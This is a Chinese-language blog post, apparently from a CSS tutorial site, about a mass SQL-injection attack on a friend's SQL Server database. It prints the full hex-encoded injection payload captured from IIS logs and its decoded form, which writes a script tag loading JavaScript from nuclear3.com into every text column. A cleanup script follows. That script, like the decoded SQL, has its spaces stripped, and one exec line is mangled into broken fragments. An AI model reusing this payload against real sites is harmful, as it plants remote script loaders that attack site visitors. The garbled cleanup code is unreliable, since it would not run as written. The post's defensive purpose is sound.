DIV CSS 佈局教程網

　　這幾天朋友的網站天天被搞破壞的人惡意注入，也許是程序沒寫好的原因，數據庫每個字段加了一段script（<Script Src=http://%63%2Enuclear3.com/css/c.JS></Script>，而這個script地址時不時的有變化）。用一些搜索引擎搜索下：/CSS/c.JS></Script>，發現好多網站居然都有這個問題。通過IIS日志捕捉到注入的原型是以下形式：

;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt
　　
(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C004000
　　
4300200056006100720063006800610072002800320035003500290020004400650063006C00610072006500200054006100620
　　
06C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063
　　
007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F006
　　
2006A006500630074007300200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200
　　
6500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D002700750
　　
02700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E005800740079
　　
00700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002
　　
E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F00430075007200
　　
73006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C00650
　　
05F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040
　　
004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078006
　　
50063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B002700
　　
2B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007200740028005600610072006300680
　　
0610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C005300630072
　　
0069007000740020005300720063003D0068007400740070003A002F002F0063002E006E00750063006C0065006100720033002
　　
E0063002500360046002500360044002F006300730073002F0063002E006A0073003E003C002F00530063007200690070007400
　　
3E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0
　　
065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C
　　
006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007
　　
400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--

　　上面cast裡面sql語句解密如下：

Declare@TVarchar(255),@CVarchar(255)
DeclareTable_CursorCursorForSelectA.Name,B.NameFromSysobjectsA,SyscolumnsBWhereA.Id=B.IdAnd
A.Xtype='u'And(B.Xtype=99OrB.Xtype=35OrB.Xtype=231OrB.Xtype=167)
OpenTable_CursorFetchNextFrom　Table_CursorInto@T,@CWhile(@@Fetch_Status=0)
Begin
Exec('update['+@T+']Set['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<Script
Src=http://%63%2Enuclear3.com/CSS/c.JS></Script>''')FetchNextFrom　Table_CursorInto@T,@C
End
CloseTable_Cursor
DeallocateTable_Cursor總結：

　　還是程序沒寫好的原因，會導致注入，希望今後寫程序能注意這個問題，不過想想用dotnet那種參數化取值，注入的可能性應該為零了。

　　因為這個朋友最怕數據丟失，希望恢復數據，於是我就幫他寫了一個清理字段的sql腳本(只適合sqlserver)。呵，也希望給那被注入的網站的清理提供方便。代碼如下：

　　declare@nameasnvarchar(128),@columnNameasnvarchar(128),@columnTypeasnvarchar(128),@injectSqlasnvarchar(111)
　　set@injectSql='<ScriptSrc=http://%63%2Enuclear3.com/CSS/c.JS></Script>'
　　　　　DECLAREcurLabelCURSORFORselectnamefromsysobjectswherextype='U'
　　　　　OPENcurLabel
　　　　　FETCHNEXTFROMcurLabelINTO@name
　　　　　WHILE@@FETCH_STATUS=0
　　　　　BEGIN
　　DECLAREcurLabel1CURSORFORSELECTColumn_name,data_typeFROMINFORMATION_SCHEMA.COLUMNSWHERE(TABLE_NAME=@name)
　　OPENcurLabel1
　　FETCHNEXTFROMcurLabel1INTO@columnName,@columnType
　　WHILE@@FETCH_STATUS=0
　　BEGIN
　　if((@columnType='text'or@columnType='ntext'))
　　　--print1
　　　BEGINTRY
　　　declare@primaryKeynvarchar(255);
　　　SELECT@primaryKey=primaryKeyfrom
　　　(select
　　　　c.nameASPrimaryKey,
　　　　casewhenc.colidin(selectik.colid
　　　　fromsysindexesi,Sysindexkeysik,sysobjectsoo
　　　　wherei.id=ik.idandi.indid=ik.indid
　　　　andi.name=oo.nameandoo.xtype='PK'--主鍵
　　　　ando.id=i.id
　　　　)then1else0endisPrimaryKey
　　　　fromsysobjectsoinnerjoinsyscolumnscono.id=c.id
　　　　whereo.xtype='U'
　　　　ando.name=@name)astwhereisPrimaryKey=1
　　　exec(0begin;set@Position=@Position-1;updatetext'+@name+'.'+@columnName+'@ptr@Position@len'''';select@Position=patindex(''%'+@injectSql+'%'','+@columnName+')from'+@name+'where'+@primaryKey+'=@id;end;FETCHNEXTFROMcurTextINTO@ptr,@id;END;CLOSEcurText;DEALLOCATEcurText'">'declare@ptrvarbinary(16);declare@idnvarchar(16);declarecurTextscrollCursorforselecttextptr('+@columnName+'),'+@primaryKey+'from'+@name+';declare@Positionint,@lenint;OPENcurText;FETCHNEXTFROMcurTextINTO@ptr,@id;WHILE@@FETCH_STATUS=0BEGIN;select@Position=patindex(''%'+@injectSql+'%'','+@columnName+')from'+@name+'where'+@primaryKey+'=@id;while@Position>0begin;set@Position=@Position-1;updatetext'+@name+'.'+@columnName+'@ptr@Position@len'''';select@Position=patindex(''%'+@injectSql+'%'','+@columnName+')from'+@name+'where'+@primaryKey+'=@id;end;FETCHNEXTFROMcurTextINTO@ptr,@id;END;CLOSEcurText;DEALLOCATEcurText')
　　　ENDTRY
　　　BEGINCATCH
　　　print(@name+'.'+@columnName)
　　　ENDCATCH;
　　else
　　　if(@columnType='nvarchar'or@columnType='varchar')
　　　exec('update'+@name+'set'+@columnName+'=replace('+@columnName+','''+@injectSql+''','''')')
　　
　　FETCHNEXTFROMcurLabel1INTO@columnName,@columnType
　　END
　　CLOSEcurLabel1
　　DEALLOCATEcurLabel1
　　　　　FETCHNEXTFROMcurLabelINTO@name
　　　　　END
　　　　　CLOSEcurLabel
　　　　　DEALLOCATEcurLabel